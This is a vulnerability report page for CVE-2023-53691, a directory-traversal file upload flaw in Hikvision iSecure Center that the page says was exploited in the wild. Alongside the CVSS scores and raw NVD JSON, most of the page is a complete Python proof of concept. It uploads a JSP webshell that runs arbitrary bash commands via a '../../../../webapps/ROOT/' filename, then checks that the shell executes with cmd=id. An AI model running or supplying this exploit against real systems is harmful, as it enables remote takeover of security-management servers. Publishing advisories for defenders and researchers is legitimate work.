Security Vulnerability Report
CVE-2023-53691 CVSS 8.3 HIGH

CVE-2023-53691

Published: 2025-10-22 04:15:52
Last Modified: 2026-04-15 00:35:42

Description

Hikvision CSMP (Comprehensive Security Management Platform) iSecure Center through 2023-06-25 allows file upload via directory traversal in the /center/api/files endpoint; this issue was exploited in the wild in 2024 and 2025.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Hikvision CSMP iSecure Center <= 2023-06-25

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CVE-2023-53691 - Hikvision iSecure Center Directory Traversal File Upload PoC This PoC demonstrates the directory traversal vulnerability in the file upload endpoint /center/api/files of Hikvision CSMP iSecure Center. """ import requests import sys TARGET_URL = "http://target-host" UPLOAD_ENDPOINT = "/center/api/files" # Malicious JSP webshell content (for demonstration purposes only) WEBSHELL_CONTENT = b"""<%@ page import="java.util.*,java.io.*"%> <% String cmd = request.getParameter("cmd"); if (cmd != null) { Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", cmd}); BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while ((line = br.readLine()) != null) { out.println(line); } } %>""" def exploit(target_url, traversal_path, filename="shell.jsp"): """ Exploit directory traversal to upload a webshell to the web root directory. :param target_url: Base URL of the target Hikvision iSecure Center :param traversal_path: Directory traversal sequence to escape upload directory :param filename: Name of the malicious file to upload """ upload_url = target_url.rstrip('/') + UPLOAD_ENDPOINT # Construct the traversal filename malicious_filename = traversal_path + filename print(f"[*] Target URL: {upload_url}") print(f"[*] Malicious filename: {malicious_filename}") # Prepare multipart file upload with traversal path files = { 'file': (malicious_filename, WEBSHELL_CONTENT, 'application/octet-stream') } # Additional form data that may be required by the API data = { 'name': malicious_filename, 'type': 'file' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': '*/*', 'Connection': 'close' } try: # Send the malicious upload request response = requests.post( upload_url, files=files, data=data, headers=headers, timeout=30, verify=False ) print(f"[*] Response Status Code: {response.status_code}") print(f"[*] Response 
Headers: {dict(response.headers)}") print(f"[*] Response Body (first 500 chars): {response.text[:500]}") if response.status_code in [200, 201]: print(f"[+] Upload may have succeeded!") # Try to access the uploaded webshell webshell_url = target_url.rstrip('/') + '/' + filename print(f"[*] Try accessing webshell at: {webshell_url}?cmd=id") check_response = requests.get(webshell_url, params={"cmd": "id"}, timeout=10) print(f"[*] Webshell Response Status: {check_response.status_code}") print(f"[*] Webshell Response: {check_response.text[:500]}") if check_response.status_code == 200 and "uid=" in check_response.text: print("[+] SUCCESS! Webshell is accessible and executing commands!") return True else: print(f"[-] Upload failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url> [traversal_path]") print(f"Example: {sys.argv[0]} http://192.168.1.100:8080") print(f"Example: {sys.argv[0]} http://192.168.1.100:8080 ../../../../webapps/ROOT/") sys.exit(1) target = sys.argv[1] traversal = sys.argv[2] if len(sys.argv) > 2 else "../../../../webapps/ROOT/" requests.packages.urllib3.disable_warnings() success = exploit(target, traversal) sys.exit(0 if success else 1)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53691", "sourceIdentifier": "[email protected]", "published": "2025-10-22T04:15:51.837", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hikvision CSMP (Comprehensive Security Management Platform) iSecure Center through 2023-06-25 allows file upload via /center/api/files directory traversal, as exploited in the wild in 2024 and 2025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-24"}]}], "references": [{"url": "https://zhuanlan.zhihu.com/p/639514473", "source": "[email protected]"}, {"url": "https://zhuanlan.zhihu.com/p/639514473", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}